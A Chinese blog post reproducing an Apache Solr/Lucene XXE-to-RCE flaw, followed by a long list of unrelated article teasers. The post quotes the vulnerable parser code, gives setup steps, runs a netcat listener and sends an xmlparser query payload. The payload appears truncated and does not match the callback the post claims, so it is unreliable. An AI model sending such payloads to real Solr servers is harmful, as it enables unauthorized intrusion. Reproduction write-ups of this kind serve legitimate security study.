skyxxb
skyxxb

Apache Solr/Lucene 0Day远程代码执行漏洞复现

最近发现网络上Apache Solr/Lucene 存在远程代码执行漏洞,现进行复现。

1.存在位置

根据漏洞详细报告,在/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java 

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }

可以调用xmlparser解释器访问远程url数据,攻击者可以利用其执行任意代码。

2.环境搭建

实验使用:
- Apache Solr 6.0(之前尝试6.6版本未成功)
- Windows 7

1.下载solr

  • http://archive.apache.org/dist/lucene/solr/6.0.0/
  • 在本地解压

2.启动solr

cd bin
solr start

访问:
http://localhost:8983/solr/#/
页面正常显示数据即成功

3. 新建core(命名为“test”)

solr stop -all
solr -e test

成功后进入

http://localhost:8983/solr/#/

我们在core admin中就可以看到创建的test

3.漏洞复现

1.启动nc 监听4444端口

nc -lvp 4444

2.访问

http://localhost:8983/solr/test/select?q={!xmlparser v='<a>a>'}

3.nc中可以看到solr访问4444端口即证明漏洞存在

Apache Solr/Lucene 0Day远程代码执行漏洞复现_第1张图片

参考:
http://lucene.472066.n3.nabble.com/Re-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp-RCE-td4358308.html

你可能感兴趣的:(漏洞验证)

  • 【Python】Python-JOSE:Python 中的 JSON Web Token 处理库 @Unity打怪升级 Pythonpythonjson人工智能前端开发语言开源机器学习
    Python-JOSE是一个用于处理JSONWebToken(JWT)和JOSE(JSONObjectSigningandEncryption)标准的Python库。它支持对JWT进行签名、加密、解密和验证等操作,是处理基于OAuth2.0和OpenIDConnect协议的身份验证和授权任务的理想选择。Python-JOSE实现了JOSE规范中定义的JWS(JSONWebSignature)、JW
  • 26. 【.NET 8 实战--孢子记账--从单体到微服务】--需求更新--用户注销、修改用户名、安全设置 喵叔哟 .NET8安全开发语言
    在实际开发过程中,项目需求的变更和增加是常见的情况,因此这篇文章我们就模拟一下项目需求新增的情况。一、需求项目经理今天提出了新的功能,需要增加重置密码、安全设置、修改用户名、注销账户这四个功能,这四个功能必须是独立的(别问为什么用“必须”,有些产品经理就这么离谱),经过讨论整理出了如下大的需求。编号需求说明1重置密码1.输入旧密码、新密码和确认密码;2.旧密码需要验证。2安全设置1.更新邮箱和手机
  • 深入理解检查约束:确保数据质量的重要工具
    title:深入理解检查约束:确保数据质量的重要工具date:2025/1/20updated:2025/1/20author:cmdragonexcerpt:在数据库管理中,检查约束是一种重要的约束类型,用于确保表中某一列或某些列的数据符合特定条件,从而维护数据的有效性和一致性。检查约束通过对数据的有效性进行验证,防止无效或不合逻辑的数据进入数据库。categories:前端开发tags:检查约
  • 基于Ubuntu(x86)系统和STM32(Keil)编写C程序分别进行编程、验证 迷信的兔子 ubuntustm32单片机linuxkeilmdk
    文章目录实验内容一、基本概念(一)、全局变量(二)、局部变量(三)、堆和栈二、编程验证(一)、基于Ubuntu用Linux系统编写C程序(二)、基于STM32用Keil编写C程序三、归纳分析四、总结五、参考文献实验内容实验内容:编写一个C程序,重温全局变量、局部变量、堆、栈等概念,在Ubuntu(x86)系统和STM32(Keil)中分别进行编程、验证(STM32通过串口printf信息到上位机串
  • 被动扫描和主动扫描的区别 Zero2One. githubjava前端网络安全系统安全
    在网络安全和漏洞检测中,被动扫描和主动扫描是两种常见的技术,它们在工作方式和应用场景上有显著的区别。被动扫描被动扫描是一种在目标无法察觉的情况下进行的信息收集方法。它通过监听网络流量、代理等方式获取数据,而不主动与目标系统进行交互。被动扫描的主要特点是隐蔽性强,不会对目标系统造成干扰1。优点隐蔽性强:由于不主动发送请求,目标系统难以察觉到扫描行为。减少干扰:不会对目标系统的正常运行造成影响。缺点信
  • SimpleHelp远程管理软件 任意文件读取漏洞复现(CVE-2024-57727)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。0x01产品描述:SimpleHelp是一款远程支持和服务交付软件,它允许技术支持团队通过互联网远程访问和控制客户端计算机,以便进行故障排除、维护和提供技术支持。该软件设计用于简化远程协助过程,提高效率,并减少
  • vsftpd虚拟用户部署 后端
    vsftpd虚拟用户部署案例提供两个用户如下,使用centos7验证可行。test*AO9ih&7ftpD@Tx4zp_shell脚本运行一键安装vsftp#!/bin/bashyum-yinstallvsftpdftp>/etc/vsftpd/vsftpd.confcat>/etc/vsftpd/vsftpd.confanonymous_enable=NOlocal_enable=YESwrit
  • 从零开始用Docker构建自己的项目环境 IRUIRUI__ docker容器运维
    目录一、安装配置Docker1.环境配置step1安装依赖step2添加Docker的官方GPG密钥step3添加Docker的APT源step4更新APT包索引step5安装DockerCE验证安装step6配置Docker加速器2.创建容器step1准备一个镜像用于运行容器step2将镜像放到宿主机step3在刚才的目录内创建Dockerfilestep4构建新的镜像step5运行容器3.其他
  • ai照片放大python源码_AI新时代-大牛教你使用python+Opencv完成人脸解锁(附源码)... weixin_39639505 ai照片放大python源码
    好吧,伙计们,我回来了。说我拖更不写文章的可以过来用你的小拳拳狠命地捶我胸口....那么今天我们来讲关于使用python+opencv+face++来实现人脸验证及人脸解锁。代码量同样不多,你可以将这些代码运用在其它一些智能领域,如智能家居,进门的时候判断你是谁,也可以加入机器学习判断来的人是客人还是熟人。在讲之前我们会先适当的拓扑一下关于人脸识别的知识点。OK废话少说下面开始正是话题。解锁原理:
  • 架构验证的时间 张友邦 架构与设计架构设计soa文档
    架构设计的各种方法论是为把事情变得更简单易懂而准备的,它们帮我们梳理复杂应用的逻辑头绪,把我们不能一下子掌握的事情通过一种有条不紊的途径消化掉。可以说,把事情变得更简单是架构设计的远景和目标。但这种简单是有条件的,实用就是它的条件。所谓实用就是要满足各种各样外部环境并尽可能的提供更多的指标,这些指标包括可伸缩性、可维护性、学习曲线、稳定性等。所谓的尽可能就意味着需要有一个平衡点,我们需要通过各种努
  • 大厂面试系列:JVM中有哪些内存区域,分别都是用来干嘛的? 石杉的架构笔记 面试求职java面试jvm内存划分类加载
    添加VX:ruyuan0220,回复:CSDN,领取更多精品学习资料!目录背景知识大厂面试背景引入到底什么是JVM的内存区域划分?存放类的方法区执行代码指令用的程序计数器Java虚拟机栈Java堆内存核心内存区域的全流程串讲其他内存区域本文小结背景知识我们先聊了一下相关的背景知识:JVM类加载这块的机制,简单介绍一下。大家需要搞明白的是,在什么情况下会触发类的加载?加载之后的验证、准备和解析分别是
  • 【gin】中间件使用之jwt身份认证和Cors跨域,go案例 {⌐■_■} gin中间件golang
    Gin-3中间件编程及JWT身份认证1.Gin中间件概述中间件是处理HTTP请求的函数,可以在请求到达路由处理函数之前或之后对请求进行处理。在Gin框架中,中间件常用于处理日志记录、身份验证、权限控制等功能。router:=gin.Default()router.Use(middleware)//使用中间件中间件可以通过Use方法进行添加,并且可以用于所有路由或特定路由组。2.JWT简介https
  • 架构验证的时间 (转) hyzhx 架构设计soa文档
    架构设计的各种方法论是为把事情变得更简单易懂而准备的,它们帮我们梳理复杂应用的逻辑头绪,把我们不能一下子掌握的事情通过一种有条不紊的途径消化掉。可以说,把事情变得更简单是架构设计的远景和目标。但这种简单是有条件的,实用就是它的条件。所谓实用就是要满足各种各样外部环境并尽可能的提供更多的指标,这些指标包括可伸缩性、可维护性、学习曲线、稳定性等。所谓的尽可能就意味着需要有一个平衡点,我们需要通过各种努
  • 【架构】软件架构决策验证标准 fox20210812 架构设计架构
    为什么需要软件架构把架构视为交流工具对项目规划实施影响力关注非功能方面能力;与设计团队做出约定;为影响力分析提供支持;企业视图:确定企业中业务流程、数据资源、信息资源、技术、面向客户的用户界面已经传输渠道,并把他们全都表示在同一张视图中。分层视图:IT企业视图:架构决策验证方式:1)完整性:如果把某个组件放入架构中,那么该组件应该要能够维持总体架构的完整性,而不应去破坏或损害架构中的某些方面;2)
  • 身份证实名认证功能的快速实现方法-Java接口集成 OCR_API 接口java开发语言
    身份证实名认证接口是互联网在线平台为了确保用户身份真实性而采用的一种验证方式是,想要实现该功能,看似很难,其实有许多第三方服务商提供身份证实名认证接口,如:翔云API等,实时联网权威数据源,支持多并发核验身份证的真伪。集成API流程:对于有身份证实名认证功能需求的用户而言,注册账号,就会有唯一的key和secret,选择需要的产品id,然后根据自身需要的代码语言进行集成,以Java为例:packa
  • 蓝桥杯16届第二次模拟 敲代码的啦哇嘻 蓝桥杯职场和发展
    今天考试去了,学校组织嘞,但俺没有拿手机拍题,遵纪守法好学生,考试就是考试,去厕所也没看。第一题,和上次的第一题是一样的2024的质因数有仨,这个就不说了,好像是2,11,23这三个。第二题,是2024和1024的最小公倍数,蛮简单验证也简单#includeintmain(){inti=2024;for(i;iintmain(){intn;inta[10000];scanf("%d",&n);in
  • Arch - 架构安全性_验证(Verification) 小小工匠 【凤凰架构】架构验证Verification
    文章目录OverView导图1.引言:数据验证的重要性概述2.数据验证的基本概念3.数据验证的层次前端验证后端验证4.数据验证的标准做法5.自定义校验注解6.校验结果的处理7.性能考虑与副作用8.小结OverView即使只限定在“软件架构设计”这个语境下,系统安全仍然是一个很大的话题。接下来我们将对系统安全架构的各个方面进行详细分析,包括认证、授权、凭证、保密、传输安全和验证,结合案例实践,展示如
  • colyseus/auth 模块详解 maply Colyseusjavascript游戏程序游戏引擎vue.js前端后端
    @colyseus/auth模块详解@colyseus/auth是Colyseus提供的一个模块,用于处理用户认证和授权操作,尤其是在构建多人在线游戏和实时应用时,帮助开发者轻松实现与Colyseus服务器的身份验证集成。以下是它的详细介绍:功能@colyseus/auth模块为开发者提供了以下功能:用户注册和登录支持通过电子邮件、用户名、密码等方式注册用户,并提供基于凭证的登录功能。第三方认证支
  • 【Docker】在 CentOS 上安装 Docker 的完整指南 丶2136 #dockerdockercentos
    目录一、准备工作二、检查系统版本三、安装Docker1.依赖包安装2.添加Docker仓库3.安装Docker四、启动与测试Docker1.启动Docker服务2.验证Docker是否安装成功3.运行HelloWorld容器五、设置Docker自动启动六、常用Docker命令七、卸载Docker总结Docker是现代软件开发中不可或缺的工具,它提供了一种轻量级的虚拟化解决方案,帮助开发者更方便地打
  • 【Docker】在 Ubuntu 上安装 Docker 的详细指南 丶2136 #dockerdockerubuntu
    目录一、准备工作二、检查系统版本三、安装Docker1.安装必要的依赖2.添加Docker的官方GPG密钥3.添加Docker的APT源4.更新APT包索引5.安装DockerCE6.验证Docker是否安装成功四、启动与测试Docker1.启动Docker服务2.运行HelloWorld容器五、设置Docker自动启动1.启用Docker服务2.检查服务状态3.启动Docker服务(如未运行)4
  • 人生建议往死里学网络安全!零基础也能跨行学习!!漏洞挖掘还能做副业 黑客老哥 web安全学习安全网络黑客
    一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
  • 在视频汇聚平台EasyNVR平台中使用RTSP拉流的具体步骤 算法人工智能视频
    之前有用户反馈,在EasyNVR平台中添加Pull时使用海康设备的RTSP流地址无法播放。经过研发的优化及一系列严谨的验证流程,我们已确认优化后的EasyNVR平台,通过Pull方式添加海康设备的RTSP流已经能够正常播放。以下是具体的操作步骤:第一步:我们需要获取一个有效的海康设备的RTSP流地址。第二步:登录至EasyNVR平台。在平台界面中,依次点击【设备列表】和【添加】,然后选择【Pull
  • 融云 IM 干货丨单群聊云存储服务开通后,如何验证生效? 融云im
    单群聊云存储服务开通后,可以通过以下几种方法验证其是否生效:1.查看控制台设置确认服务状态:登录融云控制台,进入“IM服务管理”页面,检查“单群聊消息云存储”服务是否已开启。如果已开启,服务状态应显示为“已启用”。2.发送消息并检查历史记录发送新消息:在单聊或群聊中发送几条消息。退出并重新登录:退出当前会话,然后重新登录。拉取历史消息:使用客户端SDK的接口拉取历史消息,检查是否能够获取到之前发送
  • 大量研究SSRF文章和报告的总结 渗透小白鼠 安全安全web安全网络安全
    资源链接:https://pan.quark.cn/s/a900691a3ec3免责声明由于传播、利用本公众泷羽Sec提供的文章、工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号泷羽Sec团队及作者不为此承担任何责任,一旦造成后果请自行承担!前言研究大量有关服务器端请求伪造(SSRF)的文章和报告后,输出了一份有关SSRF漏洞的全面概述服务器端请求伪造(SSRF)服务器端请求伪
  • 读零信任网络:在不可信网络中构建安全系统14流量信任 躺柒 网络安全网络安全计算机安全系统安全零信任
    1.流量信任1.1.网络流的验证和授权是零信任网络至关重要的机制1.2.零信任并非完全偏离已知的安全机制,传统的网络过滤机制在零信任网络中仍然扮演着重要的角色2.加密和认证2.1.加密和认证通常是紧密相关的,尽管其目的截然不同2.1.1.加密提供机密性,用于确保只有接收者才能读取发送的数据2.1.2.认证则用于确保接收者可以验证消息确实是由所声称的对象发送的2.2.认证还有另外一个有趣的特性,为了
  • 流量分析利器arkime的学习之路(二)---API接口 胖哥王老师 流量分析学习笔记网络协议学习arkimeAPI
    前文回忆《流量分析利器arkime的学习之路(一)---安装部署》概述注意点Arkime对所有API调用都使用摘要身份验证,因此请确保在库或curl命令中启用摘要身份验证。学习如何进行API调用的最简单方法是打开浏览器的javascript控制台,观察ArkimeUI正在进行的调用,它使用所有相同的API。注意:许多API端点都需要一个数据库字段名称,这与您在搜索表达式中使用的名称不同。查看数据库
  • 【实践】Filebeats的尝鲜 JYCJ_ Golanggolang后端
    背景落盘的日志文件,查询起来比较麻烦,所以想将其存入ES中,然后通过使用Kibana来查询方案:Filebeat第三方存储:ES链路:filebeat---->[logstash]---->ES前期验证Filebeat输出ES连接问题?ES,目前使用的es版本为7.10.x,第一步:使用filebeat最新版本,连接ES容易报下面的错误:Connectionmarkedasfailedbecaus
  • 【漏洞预警】FortiOS 和 FortiProxy 身份认证绕过漏洞(CVE-2024-55591) 李火火安全阁 漏洞预警Fortinet
    文章目录一、产品简介二、漏洞描述三、影响版本四、漏洞检测方法五、解决方案一、产品简介FortiOS是Fortinet公司核心的网络安全操作系统,广泛应用于FortiGate下一代防火墙,为用户提供防火墙、VPN、入侵防御、应用控制等多种安全功能。FortiProxy则是Fortinet提供的企业级安全代理产品,主要用于内容过滤、Web访问控制和数据安全防护等场景。下一代防火墙产品FortiGate
  • 如何切换npm到淘宝的最新镜像源? cesske npm
    目录前言一、查看当前npm镜像源二、切换到淘宝镜像源三、验证是否成功切换四、其他注意事项总结前言要切换npm到淘宝的最新镜像源,您可以按照以下步骤操作:一、查看当前npm镜像源在更改npm镜像源之前,首先需要查看当前npm正在使用的镜像源地址。您可以通过在命令行(如Windows的CMD、PowerShell或Linux/macOS的Terminal)中输入以下命令来查看:npmconfigget
  • 【前端】Layui的表格常用功能,表单提交事件,表格下拉按钮点击事件,表格外的按钮点击事件 m0_74824823 vip1024p前端layuijavascript
    欢迎来到《小5讲堂》大家好,我是。这是《前端》系列文章,每篇文章将以博主理解的角度展开讲解,特别是针对知识点的概念进行叙说,大部分文章将会对这些概念进行实际例子验证,以此达到加深对知识点的理解和掌握。温馨提示:博主能力有限,理解水平有限,若有不对之处望指正!目录前言核心方法常用模块表单按钮事件表格字段事件文章推荐前言最近在维护老系统,尽量使用过layui,但是时间久了,总会忘记一些方法的使用。因此
  • [星球大战]阿纳金的背叛 comsci
          本来杰迪圣殿的长老是不同意让阿纳金接受训练的.........     但是由于政治原因,长老会妥协了...这给邪恶的力量带来了机会     所以......现代的地球联邦接受了这个教训...绝对不让某些年轻人进入学院    
  • 看懂它,你就可以任性的玩耍了! aijuans JavaScript
              javascript作为前端开发的标配技能,如果不掌握好它的三大特点:1.原型 2.作用域 3. 闭包 ,又怎么可以说你学好了这门语言呢?如果标配的技能都没有撑握好,怎么可以任性的玩耍呢?怎么验证自己学好了以上三个基本点呢,我找到一段不错的代码,稍加改动,如果能够读懂它,那么你就可以任性了。 function jClass(b
  • Java常用工具包 Jodd Kai_Ge javajodd
    Jodd 是一个开源的 Java 工具集, 包含一些实用的工具类和小型框架。简单,却很强大! 写道 Jodd = Tools + IoC + MVC + DB + AOP + TX + JSON + HTML < 1.5 Mb Jodd 被分成众多模块,按需选择,其中 工具类模块有: jodd-core    &nb
  • SpringMvc下载 120153216 springMVC
    @RequestMapping(value = WebUrlConstant.DOWNLOAD) public void download(HttpServletRequest request,HttpServletResponse response,String fileName) { OutputStream os = null; InputStream is = null;
  • Python 标准异常总结 2002wmj python
    Python标准异常总结 AssertionError 断言语句(assert)失败 AttributeError 尝试访问未知的对象属性 EOFError 用户输入文件末尾标志EOF(Ctrl+d) FloatingPointError 浮点计算错误 GeneratorExit generator.close()方法被调用的时候 ImportError 导入模块失
  • SQL函数返回临时表结构的数据用于查询 357029540 SQL Server
    这两天在做一个查询的SQL,这个SQL的一个条件是通过游标实现另外两张表查询出一个多条数据,这些数据都是INT类型,然后用IN条件进行查询,并且查询这两张表需要通过外部传入参数才能查询出所需数据,于是想到了用SQL函数返回值,并且也这样做了,由于是返回多条数据,所以把查询出来的INT类型值都拼接为了字符串,这时就遇到问题了,在查询SQL中因为条件是INT值,SQL函数的CAST和CONVERST都
  • java 时间格式化 | 比较大小| 时区 个人笔记 7454103 javaeclipsetomcatcMyEclipse
    个人总结! 不当之处多多包含! 引用 1.0 如何设置 tomcat 的时区:          位置:(catalina.bat---JAVA_OPTS  下面加上)          set JAVA_OPT
  • 时间获取Clander的用法 adminjun Clander时间
    /**    * 得到几天前的时间    * @param d    * @param day    * @return    */   public static Date getDateBefore(Date d,int day){    Calend
  • JVM初探与设置 aijuans java
    JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。Java虚拟机包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收堆和一个存储方法域。 JVM屏蔽了与具体操作系统平台相关的信息,使Java程序只需生成在Java虚拟机上运行的目标代码(字节码),就可以在多种平台
  • SQL中ON和WHERE的区别 avords
    SQL中ON和WHERE的区别   数据库在通过连接两张或多张表来返回记录时,都会生成一张中间的临时表,然后再将这张临时表返回给用户。   www.2cto.com   在使用left jion时,on和where条件的区别如下:  1、 on条件是在生成临时表时使用的条件,它不管on中的条件是否为真,都会返回左边表中的记录。 
  • 说说自信 houxinyou 工作生活
    自信的来源分为两种,一种是源于实力,一种源于头脑.实力是一个综合的评定,有自身的能力,能利用的资源等.比如我想去月亮上,要身体素质过硬,还要有飞船等等一系列的东西.这些都属于实力的一部分.而头脑不同,只要你头脑够简单就可以了!同样要上月亮上,你想,我一跳,1米,我多跳几下,跳个几年,应该就到了!什么?你说我会往下掉?你笨呀你!找个东西踩一下不就行了吗?     无论工作还
  • WEBLOGIC事务超时设置 bijian1013 weblogicjta事务超时
            系统中统计数据,由于调用统计过程,执行时间超过了weblogic设置的时间,提示如下错误: 统计数据出错! 原因:The transaction is no longer active - status: 'Rolling Back. [Reason=weblogic.transaction.internal
  • 两年已过去,再看该如何快速融入新团队 bingyingao java互联网融入架构新团队
    偶得的空闲,翻到了两年前的帖子 该如何快速融入一个新团队,有所感触,就记下来,为下一个两年后的今天做参考。     时隔两年半之后的今天,再来看当初的这个博客,别有一番滋味。而我已经于今年三月份离开了当初所在的团队,加入另外的一个项目组,2011年的这篇博客之后的时光,我很好的融入了那个团队,而直到现在和同事们关系都特别好。大家在短短一年半的时间离一起经历了一
  • 【Spark七十七】Spark分析Nginx和Apache的access.log bit1129 apache
    Spark分析Nginx和Apache的access.log,第一个问题是要对Nginx和Apache的access.log文件进行按行解析,按行解析就的方法是正则表达式:   Nginx的access.log解析正则表达式   val PATTERN = """([^ ]*) ([^ ]*) ([^ ]*) (\\[.*\\]) (\&q
  • Erlang patch bookjovi erlang
    Totally five patchs committed to erlang otp, just small patchs. IMO, erlang really is a interesting programming language, I really like its concurrency feature. but the functional programming style
  • log4j日志路径中加入日期 bro_feng javalog4j
    要用log4j使用记录日志,日志路径有每日的日期,文件大小5M新增文件。 实现方式 log4j: <appender name="serviceLog" class="org.apache.log4j.RollingFileAppender"> <param name="Encoding" v
  • 读《研磨设计模式》-代码笔记-桥接模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 个人觉得关于桥接模式的例子,蜡笔和毛笔这个例子是最贴切的:http://www.cnblogs.com/zhenyulu/articles/67016.html * 笔和颜色是可分离的,蜡笔把两者耦合在一起了:一支蜡笔只有一种
  • windows7下SVN和Eclipse插件安装 chenyu19891124 eclipse插件
    今天花了一天时间弄SVN和Eclipse插件的安装,今天弄好了。svn插件和Eclipse整合有两种方式,一种是直接下载插件包,二种是通过Eclipse在线更新。由于之前Eclipse版本和svn插件版本有差别,始终是没装上。最后在网上找到了适合的版本。所用的环境系统:windows7JDK:1.7svn插件包版本:1.8.16Eclipse:3.7.2工具下载地址:Eclipse下在地址:htt
  • [转帖]工作流引擎设计思路 comsci 设计模式工作应用服务器workflow企业应用
    作为国内的同行,我非常希望在流程设计方面和大家交流,刚发现篇好文(那么好的文章,现在才发现,可惜),关于流程设计的一些原理,个人觉得本文站得高,看得远,比俺的文章有深度,转载如下 ================================================================================= 自开博以来不断有朋友来探讨工作流引擎该如何
  • Linux 查看内存,CPU及硬盘大小的方法 daizj linuxcpu内存硬盘大小
    一、查看CPU信息的命令 [root@R4 ~]# cat /proc/cpuinfo |grep "model name" && cat /proc/cpuinfo |grep "physical id" model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz model name :
  • linux 踢出在线用户 dongwei_6688 linux
    两个步骤: 1.用w命令找到要踢出的用户,比如下面:   [root@localhost ~]# w 18:16:55 up 39 days, 8:27, 3 users, load average: 0.03, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  • 放手吧,就像不曾拥有过一样 dcj3sjt126com
    内容提要: 静悠悠编著的《放手吧就像不曾拥有过一样》集结“全球华语世界最舒缓心灵”的精华故事,触碰生命最深层次的感动,献给全世界亿万读者。《放手吧就像不曾拥有过一样》的作者衷心地祝愿每一位读者都给自己一个重新出发的理由,将那些令你痛苦的、扛起的、背负的,一并都放下吧!把憔悴的面容换做一种清淡的微笑,把沉重的步伐调节成春天五线谱上的音符,让自己踏着轻快的节奏,在人生的海面上悠然漂荡,享受宁静与
  • php二进制安全的含义 dcj3sjt126com PHP
    PHP里,有string的概念。 string里,每个字符的大小为byte(与PHP相比,Java的每个字符为Character,是UTF8字符,C语言的每个字符可以在编译时选择)。 byte里,有ASCII代码的字符,例如ABC,123,abc,也有一些特殊字符,例如回车,退格之类的。 特殊字符很多是不能显示的。或者说,他们的显示方式没有标准,例如编码65到哪儿都是字母A,编码97到哪儿都是字符
  • Linux下禁用T440s,X240的一体化触摸板(touchpad) gashero linuxThinkPad触摸板
    自打1月买了Thinkpad T440s就一直很火大,其中最让人恼火的莫过于触摸板。   Thinkpad的经典就包括用了小红点(TrackPoint)。但是小红点只能定位,还是需要鼠标的左右键的。但是自打T440s等开始启用了一体化触摸板,不再有实体的按键了。问题是要是好用也行。   实际使用中,触摸板一堆问题,比如定位有抖动,以及按键时会有飘逸。这就导致了单击经常就
  • graph_dfs hcx2013 Graph
    package edu.xidian.graph; class MyStack { private final int SIZE = 20; private int[] st; private int top; public MyStack() { st = new int[SIZE]; top = -1; } public void push(i
  • Spring4.1新特性——Spring核心部分及其他 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • 配置HiveServer2的安全策略之自定义用户名密码验证 liyonghui160com
        具体从网上看   http://doc.mapr.com/display/MapR/Using+HiveServer2#UsingHiveServer2-ConfiguringCustomAuthentication   LDAP Authentication using OpenLDAP Setting
  • 一位30多的程序员生涯经验总结 pda158 编程工作生活咨询
    1.客户在接触到产品之后,才会真正明白自己的需求。   这是我在我的第一份工作上面学来的。只有当我们给客户展示产品的时候,他们才会意识到哪些是必须的。给出一个功能性原型设计远远比一张长长的文字表格要好。 2.只要有充足的时间,所有安全防御系统都将失败。   安全防御现如今是全世界都在关注的大课题、大挑战。我们必须时时刻刻积极完善它,因为黑客只要有一次成功,就可以彻底打败你。   3.
  • 分布式web服务架构的演变 自由的奴隶 linuxWeb应用服务器互联网
    最开始,由于某些想法,于是在互联网上搭建了一个网站,这个时候甚至有可能主机都是租借的,但由于这篇文章我们只关注架构的演变历程,因此就假设这个时候已经是托管了一台主机,并且有一定的带宽了,这个时候由于网站具备了一定的特色,吸引了部分人访问,逐渐你发现系统的压力越来越高,响应速度越来越慢,而这个时候比较明显的是数据库和应用互相影响,应用出问题了,数据库也很容易出现问题,而数据库出问题的时候,应用也容易
  • 初探Druid连接池之二——慢SQL日志记录 xingsan_zhang 日志连接池druid慢SQL
    由于工作原因,这里先不说连接数据库部分的配置,后面会补上,直接进入慢SQL日志记录。   1.applicationContext.xml中增加如下配置: <bean abstract="true" id="mysql_database" class="com.alibaba.druid.pool.DruidDataSourc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他